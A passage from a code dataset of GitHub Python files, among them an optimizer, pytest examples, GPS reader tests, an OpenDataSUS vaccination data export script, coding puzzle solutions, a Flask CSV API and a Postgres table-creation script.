self).__init__(params)\n self.lr = lr\n self._eps = 1e-7\n # initialize squared gradient history for each param\n for param in self.params:\n param._grad_hist = np.zeros(param.value.shape)\n\n def step(self):\n for param in self.params:\n # DONE: implement here\n # increment squared gradient history; param.grad contains the gradient\n # get adjusted learning rate\n # update parameters\n param._grad_hist += np.square(param.grad)\n adjusted_lr = self.lr / (np.sqrt(param._grad_hist) + self._eps)\n param.value -= adjusted_lr * param.grad\n self._cur_step += 1\n","repo_name":"HanfeiChen/ling575k","sub_path":"hw4/optim.py","file_name":"optim.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9826448529","text":"import contextlib\nfrom dataclasses import dataclass\nfrom contextvars import ContextVar\nfrom typing import Optional\n\nimport pytest\n\n\n@dataclass\nclass Icecream:\n flavor: str\n\n\nicecream_context = ContextVar[Optional[Icecream]](\"icecream_context\", default=None)\n\n\ndef get_current_icecream() -> Icecream:\n icecream = icecream_context.get()\n if icecream is None:\n raise RuntimeError(\"No icecream in context\")\n\n return icecream\n\n\n@contextlib.contextmanager\ndef using_icecream(icecream: Icecream):\n token = icecream_context.set(icecream)\n try:\n yield\n finally:\n icecream_context.reset(token)\n\n\ndef create_icecream_text():\n icecream = get_current_icecream()\n return f\"I'm eating {icecream.flavor} icecream\"\n\n\ndef test_create_icecream_text():\n with using_icecream(Icecream(\"chocolate\")):\n assert create_icecream_text() == \"I'm eating chocolate icecream\"\n\n\ndef test_create_icecream_text_without_context():\n with pytest.raises(RuntimeError) as excinfo:\n create_icecream_text()\n\n assert \"No icecream in context\" in str(excinfo.value)\n\n\ndef test_create_icecream_text_with_context():\n with using_icecream(Icecream(\"chocolate\")):\n text_1 = create_icecream_text()\n with using_icecream(\n Icecream(\"vanilla\")\n ): ## Note that the chocolate icecream is overwritten by the vanilla icecream until the context is reset\n text_2 = create_icecream_text()\n\n text_3 = create_icecream_text()\n\n assert text_1 == \"I'm eating chocolate icecream\"\n assert text_2 == \"I'm eating vanilla icecream\"\n assert text_3 == \"I'm eating chocolate icecream\"\n","repo_name":"LuscasLeo/poc-using-context-vars","sub_path":"context_vars_poc/test_icecream.py","file_name":"test_icecream.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73833882824","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author : haymai\n\n\"\"\"\n你想通过串行端口读写数据,典型场景就是和一些硬件设备打交道 (比如一个机器\n人或传感器)。\n\"\"\"\nimport serial\n\nif __name__ == '__main__':\n ser = serial.Serial('/dev/tty.usbmodem641', # Device name varies\n baudrate=9600,\n bytesize=8,\n parity='N',\n stopbits=1)\n\n ser.write(b'G1 X50 Y50\\r\\n')\n resp = ser.readline()","repo_name":"haymaicc/python-cookbook-demo","sub_path":"chapter-05/_pyserial.py","file_name":"_pyserial.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"20526622758","text":"from Interfacing.GPSReader import GPSReader\nfrom Logging.GPSLogger import GPSLogger\nimport csv\nimport sys\nimport pytest\n\n\nPORTS = {'win32': 'COM5', 'linux': '/dev/ttyACM0'}\n\n\n@pytest.fixture(params=['def'])\ndef tmp_file(tmp_path, request):\n if request.param == None:\n return None\n else:\n return tmp_path / ('gps_test.csv' if request.param == 'def' else request.param)\n\n@pytest.fixture\ndef port():\n return PORTS[sys.platform]\n\n@pytest.fixture\ndef gps(tmp_file):\n with GPSReader(tmp_file) as gps:\n yield gps\n \n \ndef test_init_ser(gps, port):\n assert gps.port == port, 'Port not set correctly. Maybe Serial failed to open.'\n\n\n@pytest.mark.parametrize('tmp_file', [None, 'def'], indirect=True)\ndef test_init_log(gps, tmp_file):\n assert gps.log_file == tmp_file\n assert gps.headers == (GPSLogger.HEADERS if tmp_file else None)\n assert gps.has_logger == (tmp_file != None)\n\n\n@pytest.mark.parametrize('tmp_file', [None, 'def'], indirect=True)\ndef test_readline(gps):\n assert gps.readline().sentence_type\n assert gps.readline(True).sentence_type\n\n\ndef test_readline_logging(gps):\n data = [gps.readline(True) for _ in range(15)]\n gps_data = [sen for sen in data if sen.sentence_type == 'GGA' or sen.sentence_type == 'GLL']\n\n assert len(data) == 15, f'Expected 15 lines of data, got {len(data)}'\n assert len(gps_data) > 0, 'No GGA or GLL sentences found'\n\n with gps.log_file.open('r') as file:\n reader = csv.reader(file, delimiter=',')\n headers, *rows = [i for i in reader]\n\n assert headers == gps.headers, 'Headers were not written to file: file writing is broken'\n assert len(rows) == len(gps_data), 'Not all gps data lines were logged'\n\n for sen, row in zip(gps_data, rows):\n assert len(row) == 4, 'Logged line does not contain required columns'\n assert str(sen.timestamp) == row[0], 'Timestamp not logged'\n assert str(sen.lat) == row[1], 'Latitude not logged'\n assert str(sen.lon) == row[2], 'Longitude not logged'\n assert str(getattr(sen, 'altitude', '')) == row[3], 'Altitude not logged'\n","repo_name":"alonso-herreros/CanSat-raspberrypi","sub_path":"code/Tests/GPSReader_test.py","file_name":"GPSReader_test.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13774900470","text":"class Solution:\n def findSubsequences(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n\n if not nums:\n return []\n\n res = set()\n\n def dfs(idx, sub):\n if nums[idx] >= sub[-1]:\n res.add(tuple(sub + [nums[idx]]))\n if idx + 1 < len(nums):\n dfs(idx + 1, sub + [nums[idx]])\n\n if idx + 1 < len(nums):\n dfs(idx + 1, sub)\n\n for i, n in enumerate(nums[:-1]):\n dfs(i+1, [n])\n\n return list(res)\n","repo_name":"juiyangchang/LeetCoding","sub_path":"python/491_Increasing_Subsequences.py","file_name":"491_Increasing_Subsequences.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6114097887","text":"#Importando as bibliotecas necessárias\nimport requests\nimport json\nimport base64\nimport pandas as pd\nfrom datetime import datetime\n\n# URL da API do OpendataSUS\nurl = 'https://imunizacao-es.saude.gov.br/_search'\n\n# Credenciais de acesso\nusername = 'imunizacao_public'\npassword = 'qlto5t&7r_@+#Tlstigi'\n\n# Codificando as credenciais para Base64\nauth_str = f'{username}:{password}'\nbase64_auth_str = base64.b64encode(auth_str.encode()).decode()\n\n#Escolhendo o tamanho de 10000 linhas com informacoes da API, segundo o manual do OpendataSUS\ntamanho = json.dumps({\n 'size':10000\n})\n\n# Criando uma sessão para lidar com o cookie\nsession = requests.Session()\nsession.headers.update({\n 'Authorization': f'Basic {base64_auth_str}',\n 'Content-Type': 'application/json'\n})\n\n# Enviar solicitação POST para acessar os dados\nacesso = session.post(url,data=tamanho)\n\n#Armazenando os dados em formato json em uma variavel\ndados = acesso.json()\n\n#Funcao para visualizar melhor os dados em json\ncovid = pd.json_normalize(dados['hits']['hits'])\n#print(covid)\n\ndata_da_vacina = covid['_source.vacina_dataAplicacao']\n#print(data_da_vacina)\n#print(type(data_da_vacina))\n\n#Convertendo series para string\ndata_str = data_da_vacina.to_string(index=False)\n#print(data_str)\n#print(type(data_str))\n\n#Dividindo a string em linhas\nlinhas = data_str.splitlines()\n#print(linhas)\n\n#Criando lista para armazenar as datas depois de fazer a conversão\ndatas_formatadas = []\n\nfor i in linhas:\n#Convertendo string de data para data no formato de números inteiros\n data_e_hora = datetime.strptime(i,'%Y-%m-%dT%H:%M:%S.%fZ').strftime('%Y-%m-%d')\n datas_formatadas.append(data_e_hora) \n\n#Definindo as variaveis que serão salvas num novo dataframe\ndata_nascimento = covid['_source.paciente_dataNascimento']\nestabelecimento = covid['_source.estabelecimento_razaoSocial']\nuf_estabelecimento = covid['_source.estabelecimento_uf']\nuf_paciente= covid['_source.paciente_endereco_uf']\nlote_vacina = covid['_source.vacina_lote']\ncodigo_raca_paciente = covid['_source.paciente_racaCor_codigo']\nnome_estabelecimento = covid['_source.estalecimento_noFantasia']\nfabricante_vacina = covid['_source.vacina_fabricante_nome']\ndose_vacina = covid['_source.vacina_descricao_dose']\nnumero_dose_vacina = covid['_source.vacina_numDose']\ngenero_paciente = covid['_source.paciente_enumSexoBiologico']\nidade_paciente = covid['_source.paciente_idade']\nnome_vacina = covid['_source.vacina_nome']\netnia_paciente = covid['_source.paciente_racaCor_valor']\nendereco_paciente = covid['_source.paciente_endereco_nmPais']\nmunicipio_estabelecimento = covid['_source.estabelecimento_municipio_nome']\ncodigo_vacina = covid['_source.vacina_codigo']\ndatas = datas_formatadas\n\n#Criando um novo dataframe extraindo apenas as variáveis de interesse do API do OpenDataSus\ndf_covid = pd.DataFrame(data={'DataNascimento':data_nascimento,'Estabelecimento':estabelecimento,'UF':uf_estabelecimento,'UFPaciente':uf_paciente,'LoteVacina':lote_vacina,'CodigoEtniaPaciente':codigo_raca_paciente,'NomeEstabelecimento':nome_estabelecimento,'FabricanteVacina':fabricante_vacina,'DoseVacina':dose_vacina,'NumeroDose':numero_dose_vacina,'Genero Paciente':genero_paciente,'Idade Paciente':idade_paciente,'Nome Vacina':nome_vacina,'EtniaPaciente':etnia_paciente,'EnderecoPaciente':endereco_paciente,'Municipio':municipio_estabelecimento,'CodigoVacina':codigo_vacina,'DataAplicacao':datas})\n#print(df_covid)\n\n# Convertendo a coluna 'DataAplicacao' para o formato de data do pandas\ndf_covid['DataAplicacao'] = pd.to_datetime(df_covid['DataAplicacao'])\n#print(df_covid)\n\n#Filtrar os dados com as condições desejadas para um determinado municipio em um determinado período de tempo\nfiltro_data = df_covid['DataAplicacao'] < pd.to_datetime('2023-01-01')\nfiltro_municipio = df_covid['Municipio'] == 'SAO PAULO'\ndf_filtrado = df_covid[filtro_data & filtro_municipio]\n\n# Criar um novo DataFrame com as colunas de interesse para serem salvas em uma planilha\ncolunas_interesse = ['EtniaPaciente', 'DataAplicacao', 'Municipio']\ndf_final = df_filtrado[colunas_interesse]\n\n#Criar uma nova planilha Excel\ncovid_excel = 'covid_vacinacao.xlsx'\nwriter = pd.ExcelWriter(covid_excel, engine='openpyxl')\n\n#Escrevendo os dados na planilha Excel em colunas distintas\ndf_final.to_excel(writer, sheet_name='Vacinacao', index=False)\n\n# Salvar a planilha Excel\nwriter.save()\nprint('Concluiu?')\n\n############################################################################\n# RODAR:python3 api_covidgov.py \n############################################################################\n","repo_name":"wilmorales21/Scripts","sub_path":"APIs/api_covidgov.py","file_name":"api_covidgov.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72807751625","text":"import math\nimport sys\nimport heapq\n\nparents = []\n\n\ndef get_parent(node):\n start = node\n while node != parents[node]:\n node = parents[node]\n parents[start] = node\n return node\n\n\ndef solution(N, points):\n heap = []\n global parents\n parents = [i for i in range(N + 1)]\n for i in range(N):\n a1, b1 = points[i]\n for j in range(i + 1, N):\n a2, b2 = points[j]\n heapq.heappush(heap, (math.sqrt(abs(a1 - a2) ** 2 + abs(b1 - b2) ** 2), i + 1, j + 1))\n answer = 0\n cnt = 0\n while heap:\n dist, a, b = heapq.heappop(heap)\n parent_a = get_parent(a)\n parent_b = get_parent(b)\n if parent_b != parent_a:\n cnt += 1\n if parent_a > parent_b:\n parents[parent_b] = parent_a\n else:\n parents[parent_a] = parent_b\n answer += dist\n if cnt == N:\n break\n\n print(round(answer, 2))\n\n\ndef main():\n N = int(sys.stdin.readline().rstrip())\n points = []\n for _ in range(N):\n points.append(list(map(float, sys.stdin.readline().rstrip().split())))\n solution(N, points)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fineman999/Algorithm","sub_path":"BaekJoon/Gold/Level3/make_star.py","file_name":"make_star.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33361263819","text":"from copy import deepcopy\nfrom pprint import pprint\nfrom aocd import get_data\nfrom time import time\nimport re\n\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# --- Day 22: --- #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Part 1 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# Part 2 #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n# #\n# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n\n# load sample data, copied and pasted from the site into list. Each list item is one line of input\nmyset = \"\"\" ...#\n .#..\n #...\n ....\n...#.......#\n........#...\n..#....#....\n..........#.\n ...#....\n .....#..\n .#......\n ......#.\n\n10R5L5R10L4R5L5\"\"\".splitlines()\n\n# once the test data provides the right answer: replace test data with data from the puzzle input\nmyset = get_data(day=22, year=2022).splitlines()\nstarttime = time()\n# for i,d in enumerate(myset):\n# print(f'{i}: {d}')\n\nE = 0\nS = 1\nW = 2\nN = 3\nwalls = set()\npaths = set()\ncurpos = ()\ncurdir = E\ninst = ''\nmoves = []\ndirs = {\n E: {\n 'R': S,\n 'L': N,\n },\n S: {\n 'R': W,\n 'L': E,\n },\n W: {\n 'R': N,\n 'L': S,\n },\n N: {\n 'R': E,\n 'L': W,\n },\n}\n\nfor i,y in enumerate(myset):\n if y == '':\n inst = myset[i+1]\n break\n for j,x in enumerate(y):\n if curpos == () and i == 0 and x == '.':\n curpos = (j+1,i+1)\n if x == '.':\n paths.add((j+1,i+1))\n elif x == '#':\n walls.add((j+1,i+1))\n# print(curpos)\n# print('-----------------------------')\n# print(walls)\n# print('-----------------------------')\n# print(paths)\n# print('-----------------------------')\n# print(inst)\n\ntemp_move = ''\nwhile inst:\n if inst[0].isnumeric():\n temp_move += inst[0]\n inst = inst[1:]\n else:\n moves.append(int(temp_move))\n temp_move = ''\n moves.append(inst[0])\n inst = inst[1:]\nif len(temp_move) > 0 and temp_move.isnumeric():\n moves.append(int(temp_move))\ndel temp_move\ndel inst\n\n# pprint(dirs)\n\n# print(moves)\n\nfor x in moves:\n if type(x) == int:\n # print(f'try to move {x} spaces.')\n # print(f'from: {curpos}')\n # I know there is a better way to determine direction, but..... I'm lazy\n if curdir == E:\n d = (1,0)\n elif curdir == S:\n d = (0,1)\n elif curdir == W:\n d = (-1,0)\n elif curdir == N:\n d = (0,-1)\n while(x):\n nextpos = (curpos[0] + d[0],curpos[1] + d[1])\n if nextpos in walls:\n break\n elif nextpos in paths:\n curpos = nextpos\n x-=1\n else:\n #wrap\n if curdir == E: #find the space on the left side of the board\n # again, I know there is a better way.....\n minx = 0\n for z in walls.union(paths):\n if z[1] == curpos[1] and (z[0] < minx or minx == 0):\n minx = z[0]\n nextpos = (minx, curpos[1])\n elif curdir == S: #find the space on the left side of the board\n # again, I know there is a better way.....\n miny = 0\n for z in walls.union(paths):\n if z[0] == curpos[0] and (z[1] < miny or miny == 0):\n miny = z[1]\n nextpos = (curpos[0], miny)\n elif curdir == W: #find the space on the left side of the board\n # again, I know there is a better way.....\n maxx = 0\n for z in walls.union(paths):\n if z[1] == curpos[1] and z[0] > maxx:\n maxx = z[0]\n nextpos = (maxx, curpos[1])\n elif curdir == N: #find the space on the left side of the board\n # again, I know there is a better way.....\n maxy = 0\n for z in walls.union(paths):\n if z[0] == curpos[0] and z[1] > maxy:\n maxy = z[1]\n nextpos = (curpos[0], maxy)\n if nextpos in walls:\n break\n elif nextpos in paths:\n curpos = nextpos\n x-=1\n # print(f'to: {curpos}')\n else:\n # print(f'curdir is {curdir}, turn {x} to {dirs[curdir][x]}.')\n curdir = dirs[curdir][x]\n\n# print('-------------------------------')\n# print(f'Current Position: {curpos}, facing {curdir}.')\n\np1ans = (curpos[1] * 1000) + (4 * curpos[0]) + curdir\n\nprint(f'Part 1 Answer is: {p1ans}')\nprint(time() - starttime)\n\n","repo_name":"azmcnutt/AOC-Python","sub_path":"2022/Day22.py","file_name":"Day22.py","file_ext":"py","file_size_in_byte":5737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31612960108","text":"import serial, os, threading, sys, time\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n#Serial takes these two parameters: serial device and baudrate\r\nser = serial.Serial('COM5', 9600)\r\ncurrent = []\r\nfig = plt.figure() \r\nax = fig.add_subplot(111)\r\nax.set_ylabel('Temp')\r\n\r\n\r\n\r\ndef animate(i, current, ser):\r\n global max,min\r\n if ser.in_waiting:\r\n os.system(\"cls\")\r\n data = ser.readline()\r\n print(\"Temperature logger\")\r\n print(\"^^^^^^^^^^^^^^^^^^\")\r\n print(data.decode('utf'))\r\n print(\"Display mode: \" + get_mode(mode))\r\n input_list = data.split()\r\n current.append(float(input_list[1]))\r\n max = float(input_list[3])\r\n min = float(input_list[5])\r\n \r\n \r\n ax.clear() # clear the plot before drawing new data\r\n ax.plot(current)\r\n ax.set_ylim(min-5, max+5)\r\n ax.set_xlim(len(current)-30, len(current)+30)\r\n ax.set_title('Max = ' + str(max) + ' Min = ' + str(min))\r\n \r\n\r\n\r\n\r\ndef read_input():\r\n global mode\r\n mode = '0'\r\n while True:\r\n mode = input(\"\") # read input from the terminal\r\n ser.write(mode.encode('utf'))\r\n sys.stdout.write('Entering ' + str(get_mode(mode)) + ' mode') # write output to the terminal\r\n\r\ndef get_mode(z):\r\n if z=='1':\r\n return ' (1) max '\r\n elif z=='2':\r\n return ' (2) min'\r\n else:\r\n return 'default'\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n# main -------------------------------------------------------------------------------------------------------------------------\r\n\r\n# create a new thread to run the read_input function\r\ninput_thread = threading.Thread(target=read_input)\r\ninput_thread.daemon = True\r\ninput_thread.start()\r\n\r\n\r\n\r\nwhile not ser.in_waiting:\r\n pass\r\n\r\n \r\nani = animation.FuncAnimation(fig, animate, frames=60, fargs=(current, ser), interval=500) \r\nplt.show()\r\n","repo_name":"Hunmbal/Temperature-Monitoring-system","sub_path":"Python - VS.code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21300812905","text":"# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n def __init__(self, x):\n self.value = x\n self.next = None\n\n\ndef reverse(head):\n n = head\n r = None\n temp = None\n\n while n:\n # Move forward\n temp = n\n n = n.next\n\n # Join\n temp.next = r\n r = temp\n\n return temp\n\n\ndef solution(head):\n ptr = head\n count = 0\n while ptr:\n ptr = ptr.next\n count += 1\n\n if count < 2:\n return True\n mid = (count - 1) // 2\n\n ptr = head\n while mid:\n ptr = ptr.next\n mid -= 1\n\n ptr1 = reverse(ptr.next)\n ptr = head\n while ptr1:\n if ptr.value != ptr1.value:\n return False\n ptr = ptr.next\n ptr1 = ptr1.next\n\n return True\n","repo_name":"rhoitjadhav/competitive-programming-practice","sub_path":"codesignal/archive/interview-practice/isListPalindrome .py","file_name":"isListPalindrome .py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18219272562","text":"from django.test import TestCase\n\nfrom apps.student.services.applicationuserservice import ApplicationUserService\nfrom apps.student.queries.applicationuserquery import ApplicationUserQuery\nfrom apps.student.models.numberingmaster import NumberingMaster\nfrom apps.student.models.masterdata import MasterData\n\n\nclass ApplicationUserServiceTestCase(TestCase):\n\n def setUp(self):\n NumberingMaster.objects.create(\n code='01', initial='U', value=1, comment='')\n NumberingMaster.objects.create(\n code='02', initial='R', value=1, comment='')\n MasterData.objects.create(\n code=\"002\",\n sub_code=\"01\",\n value='active',\n sub_value='sub_value',\n comment='')\n MasterData.objects.create(\n code=\"002\",\n sub_code=\"02\",\n value='stop',\n sub_value='sub_value',\n comment='')\n\n def test(self):\n\n user_id = \"\"\n email = \"email@example.com\"\n first_name = \"first_name\"\n last_name = \"last_name\"\n full_name = \"full_name\"\n authority = \"02\"\n status = \"01\"\n comment = \"comment\"\n login_user_id = \"U0000\"\n\n ApplicationUserService().save_user(\n user_id,\n email,\n first_name,\n last_name,\n full_name,\n authority,\n status,\n comment,\n login_user_id)\n\n user_list = ApplicationUserQuery().get_active_users()\n user = user_list[0]\n\n self.assertEqual(user.email, \"email@example.com\")\n self.assertEqual(user.first_name, \"first_name\")\n self.assertEqual(user.last_name, \"last_name\")\n self.assertEqual(user.full_name, \"full_name\")\n self.assertEqual(user.authority, \"02\")\n self.assertEqual(user.status, \"01\")\n self.assertEqual(user.comment, \"comment\")\n self.assertEqual(user.create_user_id, \"U0000\")\n self.assertEqual(user.update_user_id, \"U0000\")\n\n user_id = user.user_id\n email = \"email3@example.com\"\n first_name = \"first_name3\"\n last_name = \"last_name3\"\n full_name = \"full_name3\"\n authority = \"03\"\n status = \"02\"\n comment = \"comment3\"\n login_user_id = \"U0003\"\n\n ApplicationUserService().save_user(\n user_id,\n email,\n first_name,\n last_name,\n full_name,\n authority,\n status,\n comment,\n login_user_id)\n\n result = ApplicationUserQuery().get_user(user_id)\n\n self.assertEqual(result.email, \"email3@example.com\")\n self.assertEqual(result.first_name, \"first_name3\")\n self.assertEqual(result.last_name, \"last_name3\")\n self.assertEqual(result.full_name, \"full_name3\")\n self.assertEqual(result.authority, \"03\")\n self.assertEqual(result.status, \"02\")\n self.assertEqual(result.comment, \"comment3\")\n self.assertEqual(result.create_user_id, \"U0000\")\n self.assertEqual(result.update_user_id, \"U0003\")\n\n ApplicationUserService().delete_user(user_id)\n\n deleted = ApplicationUserQuery().get_user(user_id)\n\n self.assertEqual(deleted, None)\n\n","repo_name":"TsJazz27Sumin/nakamuratamara","sub_path":"songcycle/apps/student/tests/services/test_applicationuserservice.py","file_name":"test_applicationuserservice.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7922662813","text":"from flask import Flask\nfrom flask_restful import Resource, Api, reqparse\nimport pandas as pd\nimport ast\napp = Flask(__name__)\napi = Api(app)\n\n\nclass Users(Resource):\n def get(self):\n data = pd.read_csv('users.csv') # read CSV\n data = data.to_dict() \n return {'data': data}, 200 \n\n def post(self):\n parser = reqparse.RequestParser() # initialize\n \n parser.add_argument('A', required=True) # add args\n parser.add_argument('B', required=True)\n parser.add_argument('C', required=True)\n \n args = parser.parse_args() # parse arguments to dictionary\n \n # create new dataframe containing new values\n new_data = pd.DataFrame({\n 'A': args['A'],\n 'B': args['B'],\n 'C': args['C'],\n })\n # read our CSV\n data = pd.read_csv('users.csv')\n\n if args['userId'] in list(data['userId']):\n return {\n 'message': f\"'{args['userId']}' already exists.\"\n }, 401\n else:\n # create new dataframe containing new values\n new_data = pd.DataFrame({\n 'userId': args['userId'],\n 'name': args['name'],\n 'city': args['city'],\n 'locations': [[]]\n })\n # add the newly provided values\n data = data.append(new_data, ignore_index=True)\n data.to_csv('users.csv', index=False) # save back to CSV\n return {'data': data.to_dict()}, 200 # return data with 200 OK\n\n\napi.add_resource(Users, '/users') \n\nif __name__ == '__main__':\n app.run()","repo_name":"suraj-raj-3000/Prospecta_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14723784432","text":"\"\"\"Mini-project 2 task 1 subtask e by Sen Ivan\"\"\"\nimport os\ndef find_same(path1:str, path2:str, res_path:str) -> None:\n \"\"\"\n Find same lines in two files and write them to result file.\n >>> import tempfile\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f:\n ... _ = f.write('a\\\\nb\\\\na\\\\n')\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as f2:\n ... _ = f2.write('a\\\\nb\\\\n')\n >>> with tempfile.NamedTemporaryFile(mode='w+', delete=False) as res:\n ... find_same(f.name, f2.name, res.name)\n >>> with open(res.name, 'r') as res:\n ... print(res.read())\n a\n b\n \"\"\"\n if not os.path.isfile(res_path):\n raise ValueError('Result file does not exist or is directory')\n if not (os.path.isfile(path1) and os.path.isfile(path2)):\n raise ValueError('One of the files does not exist or is directory')\n with open(path1, 'r', encoding='utf-8') as file1, open(path2, 'r', encoding=\"utf-8\")\\\n as file2, open(res_path, 'w+', encoding=\"utf-8\") as res_file:\n lines1 = file1.readlines()\n lines2 = file2.readlines()\n for line1 in lines1:\n if line1 in lines2 and line1 not in res_file:\n res_file.write(line1)\nif __name__ == \"__main__\":\n # import doctest\n # print(doctest.testmod())\n import argparse\n parser = argparse.ArgumentParser(\n prog='task 1 subtask e',\n description='find same lines in files'\n )\n\n parser.add_argument('path1', type=str, help='first file to compare')\n parser.add_argument('path2', type=str, help='second file to compare')\n parser.add_argument('dst', type=str, help='file to write results to')\n\n args = parser.parse_args()\n find_same(args.path1, args.path2, args.dst)\n","repo_name":"senivan/mini-project-2","sub_path":"project2_task1_e.py","file_name":"project2_task1_e.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69794423626","text":"# Problem Statement: https://leetcode.com/problems/partition-labels/\n\nclass Solution:\n def partitionLabels(self, s: str) -> List[int]:\n \n last = {s[i]: i for i in range(len(s))} # last appearance of the letter\n i, ans = 0, []\n while i < len(s):\n end, j = last[s[i]], i + 1\n while j < end: # validation of the part [i, end]\n if last[s[j]] > end:\n end = last[s[j]] # extend the part\n j += 1\n \n ans.append(end - i + 1)\n i = end + 1\n \n return ans\n \n'''\nSince each letter can appear only in one part, we cannot form a part shorter than the \nindex of the last appearance of a letter subtracted by an index of the first appearance. \nFor example here (absfab) the lengths of the first part are limited by the positions of the letter a. \nSo it's important to know at what index each letter appears in the string last time. \nWe can create a hash map and fill it with the last indexes for letters.\n\nAlso, we have to validate a candidate part. \nFor the same example (absfab) we see that letter a cannot form a border for the first part \nbecause of a nasty letter b inside. So we need to expand the range of the initial part.\n'''","repo_name":"yashitanamdeo/leetcode","sub_path":"Medium/763. Partition Labels.py","file_name":"763. Partition Labels.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"7141750517","text":"import psycopg2\nfrom decouple import config\n\n# connect to database\nconn = psycopg2.connect(\n host=config('POSTGRES_HOST'),\n port=\"5432\",\n database=\"13f_2023\",\n user=config('POSTGRES_USER'),\n password=config('POSTGRES_PASSWORD')\n)\n# create a cursor\ncur = conn.cursor()\ndef create_tables():\n # create a cursor\n cur = conn.cursor()\n\n # create tables\n create_table_commands = (\n \"\"\"\n CREATE TABLE filings (\n filing_id varchar(255) PRIMARY KEY,\n cik int,\n filer_name varchar(255),\n period_of_report date\n )\n \"\"\",\n \"\"\"\n CREATE TABLE holdings (\n filing_id varchar(255),\n name_of_issuer varchar(255),\n cusip varchar(255),\n title_of_class varchar(255),\n value bigint,\n shares int,\n put_call varchar(255),\n CONSTRAINT fk_holdings_filings\n FOREIGN KEY (filing_id) REFERENCES filings(filing_id)\n )\n \"\"\"\n\n # ,\"\"\"\n # CREATE TABLE holding_infos (\n # cusip varchar(255),\n # security_name varchar(255),\n # ticker varchar(50),\n # exchange_code varchar(10),\n # security_type varchar(50)\n # )\n # \"\"\"\n )\n\n # create table one by one\n for command in create_table_commands:\n cur.execute(command)\n\n # close cursor\n cur.close()\n\n # make the changes to the database persistent\n conn.commit()\n\ncreate_tables()\n","repo_name":"AleksKostadinov/Investment_using_AI","sub_path":"analizing13f/create_tables.py","file_name":"create_tables.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3712500685","text":"#!/usr/bin/env python3\n\nimport sys, argparse, functools\n\ndef split_itv(a,b):\n h = b//2 + (b % 2)\n return [(a,h),(a+h,b-h)]\n\ndef partition_two(cutlen,m,n):\n stack = [((0,m),(0,n))]\n while len(stack) > 0:\n ((i,j),(k,l)) = stack.pop()\n if j <= cutlen and l <= cutlen:\n yield ((i,j),(k,l))\n else:\n if j < l:\n for itv in split_itv(k,l):\n stack.append(((i,j),itv))\n else:\n for itv in split_itv(i,j):\n stack.append((itv,(k,l)))\n\ndef partition_interval(cutlen,m):\n for i in range(0,m,cutlen):\n if i + cutlen <= m:\n yield (i,cutlen)\n else:\n if m > i:\n yield (i,m - i)\n\ndef partition_self(cutlen,m):\n ps = list(partition_interval(cutlen,m))\n for p in ps:\n yield (p,None)\n for i in range(len(ps)):\n for j in range(i+1,len(ps)):\n yield (ps[i],ps[j])\n\ndef antidiagonal(itv):\n if itv[1] is None:\n return 2 * itv[0][0]\n else:\n return itv[0][0] + itv[1][0]\n\ndef antidiagonal_cmp(l,r):\n if antidiagonal(l) < antidiagonal(r):\n return -1\n if antidiagonal(l) > antidiagonal(r):\n return +1\n if l[0][0] < r[0][0]:\n return -1\n if l[0][0] > r[0][0]:\n return 1\n assert false\n\ndef partition(cutlen,m,n):\n l = list()\n if n == 0:\n for v in partition_self(cutlen,m):\n l.append(v)\n 